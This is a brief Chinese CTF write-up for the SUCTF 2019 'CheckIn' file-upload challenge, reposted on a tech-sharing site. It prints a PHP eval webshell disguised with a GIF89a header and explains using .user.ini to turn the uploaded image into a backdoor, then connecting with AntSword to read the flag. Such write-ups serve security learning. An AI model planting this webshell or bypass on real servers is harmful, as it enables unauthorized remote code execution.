标签:SUCTF user CheckIn 2019 ini 木马 php 上传 图片
看到字符upload 就想到了文件上传漏洞
就先上传一个一句话木马试试
似乎直接上传不成功,可能是有什么过滤
再上传一个包含一句话木马的图片试试
发现提示不能是图片,这时候就不会了,在网上找了一下wp
发现需要修改一下木马的内容
GIF89a
<script language='php'>@eval($_POST['a']);</script>
成功上传木马图片,并且能知道上传的地方,但是图片能连接,但内容为空
看到大佬利用了.user.ini
这个后缀使之构成php后门
也就照这大佬的思路进行复现
使用蚁剑连接cat /flag
即可
总结
这道题主要是还是利用了文件上传漏洞,利用.user.ini文件构造php后门,使之前上传的木马图片可以被执行。
标签:SUCTF,user,CheckIn,2019,ini,木马,php,上传,图片 来源: https://www.cnblogs.com/traverller-2333/p/16421064.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。